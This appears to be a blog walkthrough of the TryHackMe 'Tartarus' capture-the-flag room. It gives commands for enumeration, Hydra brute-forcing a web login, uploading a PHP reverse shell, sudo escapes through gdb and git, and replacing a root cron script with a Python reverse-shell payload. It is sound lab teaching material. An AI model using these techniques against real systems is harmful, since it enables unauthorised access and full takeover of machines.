The skills to be tested and needed to solve this room are: nmap, gobuster, hydra, burp suite, privilege escalation, cron jobs, and nc (netcat). This room has three privilege escalations, two horizontal lateral movement and the last one obviously is vertical.
This room was released on 8/13/2020, and I wanted to try if I can crack it. This room is rated easy in terms of difficulty, but I thought it was more challenging than easy, mainly because I haven’t used vim and it was the only editor available to use. Yeah….yeah….you can laugh at me for being a nano user. lol
I also chose to mask part of the answers so you will have to do the steps I took and see how things work. I don’t want to take away this learning experience from you.
Shoutout to the room creator, @csenox. You can access the room at https://tryhackme.com/room/tartarus
I was assigned a victim IP address of 10.10.215.66 to attack. You will be assigned a different IP address, so double check your entries when following this walk-through.
We only need to retrieve the user flag and the root flag to complete the room:
- User flag:
- Root flag:
- Deploy the machine to get a victim IP address:
2. Scan the machine for open ports and services by using nmap. Use the command: nmap -sC -sV -oG nmap/tartarus 10.10.215.66
- -sC – to scan using the default nmap scripts
- -sV – to pull version information of open ports found during the scan
- -oG nmap/tartarus – to save the results of the scan to a file named “tartarus” and saved in a grepable format
3. The nmap scan result is showing anonymous FTP login allowed. Login to FTP by typing ftp 10.10.215.66, for the username type anonymous, and leave the password blank:
4. Search for any interesting files by typing ls -la:
- The above screenshot was trying to trick us. There was nothing helpful inside the test.txt file, and the tricky part is the ellipsis (…). Normally there are only two hidden folders that uses dots, the root directory and the current user’s home directory. See screenshot below taken from my personal machine:
5. Search the interestingly named (…) directory:
6. Search the (…) directory inside the (…) directory:
7. Download the yougotgoodeyes.txt file to our attack machine (kali) by typing get yougotgoodeyes.txt
8. Open the file to see what is in it by typing cat yougotgoodeyes.txt
9. Open a browser to check what is running on port 80:
10. Checked on the Page Source Code and there is no hidden message found. Let’s use gobuster to search for hidden directories and files by typing gobuster dir -u http://10.10.215.66 -w /usr/share/wordlists/dirb/common.txt
- dir – to use directory/file brute-forcing mode
- -u – is the flag to tell gobuster that we are scanning a URL
- -w /usr/share/wordlists/dirb/common.txt– is the flag to set the list of possible directory and file names
11. Check the content of the /robots.txt file by going to your web browser and type 10.10.215.66/robots.txt in the URL bar:
12. Go and check the /admin-dir that we found in the robots.txt file by typing 10.10.215.66/admin-dir in your browser’s URL bar:
- We still don’t know where to use the credentials that we found. We could try to brute-force SSH using those credentials, but first, I want to enumerate the /admin-dir if there are any more helpful files and directories we can find by using gobuster again. This time type gobuster dir -u http://10.10.215.66/admin-dir -w /usr/share/wordlists/dirb/common.txt
14. Now, let’s go check the /sUp3r-s3cr3t directory we found in the FTP server:
- I tried default credentials like admin:admin, admin:password, root:root and they don’t work. We will have to use Hydra to brute-force this login form.
15. Use Burp Suite to easily retrieve parameters that we need to use with Hydra:
16. Now, are going to use Hydra to brute-force the web login form. Type hydra -L userid -P credentials.txt 10.10.215.66 http-post-form “/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:Incorrect Username”
- -L userid – to instruct hydra that we are using the userid file that contains a list of possible usernames
- -P credentials.txt – to instruct hydra that we are using the credentials.txt file that contains a list of possible passwords
- http-post-form “/sUp3r-s3cr3t/authenticate.php – indicates hydra that the login page authenticate.php uses a http-post-form type form
- username=^USER^ – the “^” signs are for hydra to know where to enter usernames
- password=^PASS^ – the “^” signs are for hydra to know where to enter passwords
- Incorrect Username – is the “failure string”. This is important so hydra knows that the attempt to login failed and hydra can move on to the next combination of username and password that might work
17. Login to the http://10.10.215.66/sUp3r-secr3t page:
- Now, the screenshot above is showing us that there might be other directories and pages inside the /sUp3r-s3cr3t directory. Let’s try and enumerate it using gobuster by typing gobuster dir -u http://10.10.215.66/sUp3r-s3cr3t -w /usr/share/wordlists/dirb/common.txt
18. Check the /images directory inside the /sUp3r-s3cr3t:
19. Test the upload page and see if we can open it inside the /sUp3r-s3cr3t/images/uploads folder. I created a file called test.txt:
20. Check the /sUp3r-s3cr3t/images/uploads if the test.txt is there and if we can open it.
21. Now that we know that we can upload files, the next step that we have to do is to upload a PHP reverse-shell so we can access the web server. I just googled “pentestmonkey PHP reverse shell” and got the result here. Go ahead and download the file:
22. We need to extract the file php-reverse-shell-1.0.tar.gz by typing tar -xzvf php-reverse-shell-1.0.tar.gz
23. Look for the file php-reverse-shell.php and edit the information to point to your IP address and port number to obtain a reverse-shell. Type sudo nano php-reverse-shell.php
24. Change the permission of the php-reverse-shell.php file by typing sudo chmod +x php-reverse-shell-php
25. Upload our payload:
26. Before we execute the payload, we have to setup a listener on our attack machine by typing nc -nlvp 9999. Be sure that the port number you choose on your listener matches the one that you entered in the php-reverse-shell.php payload:
27. Go to the /sUp3r-s3cr3t/images/uploads through your browser and run the payload:
- Our listener connected successfully, we now have a reverse-shell:
28. Let’s convert this to a more stable shell by checking if python is running on the victim machine by typing which python
29. Now, the conversion to a more stable shell by typing python -c ‘import pty;pty.spawn(“/bin/bash”)’
30. We are in, and let’s try if we can locate the user flag by typing find / -name user.txt 2>/dev/null. I like adding the 2>/dev/null so it dumps any permission denied of errors to null and we don’t have to scroll and look for the file that we have access to:
31. Open the user.txt file by typing cat /home/d4rckh/user.txt
- Besides the user.txt file there was another file called cleanup.py.
32. Let’s check if our current user, www-data have any sudo privilege by typing sudo -l
- Let’s check GTFObins on how to exploit gbd:
33. We have to use -u as we sudo so we can change user to user thirtytwo. If you remember on Step 32, user thirtytwo was the user specified. Type sudo -u thirtytwo /var/www/gdb -nx -ex ‘!sh’ -ex quit
34. Again, spawn a more stable shell, python -c ‘import pty;pty.spawn(“/bin/bash”)’ and check if there is any interesting file in user thirtytwo‘s home directory:
35. Open note.txt by typing cat note.txt
36. Type sudo -l to check what other sudo privileges can we find in user thirtytwo
37. Check GTFObins again to exploit git
38. Type sudo -u d4rckh /usr/bin/git -p help config and the !/bin/sh
- Still we cannot find anything except for the cleanup.py file. And upon running sudo -l, we have nothing. Looking at the file cleaup.py, it looks like a script that removes whatever is inside the /home/cleanup/ directory. Let’s check /etc/crontab if this script runs in a schedule. You can do this by typing cat /etc/crontab
- We can edit the file cleanup.py to give us a reverse-shell as root.
39. Nano doesn’t work to edit the file cleanup.py, the only editor that works is vim, and I struggle with vim, so what I did next is to completely just create a new file and still keep the name cleanup.py, because that is the file that that is in crontab. First, we have to rename the current cleanup.py by typing mv cleanup.py cleanup.py.old
40. Let’s create a new cleanup.py file with a reverse-shell payload by typing vim cleanup.py. And let’s check PentestMonkey for a python reverse-shell that we can use:
- New cleanup.py file
41. Set up the listener on your kali machine by typing nc -nlvp 8888 and wait for 2 minutes for the new cleanup.py to be run and we get our reverse-shell:
42. Check who we are by typing whoami
43. Finally, open root.txt by typing cat root.txt
Hope you enjoyed it and learned something too!
Don’t forget to subscribe to my blog!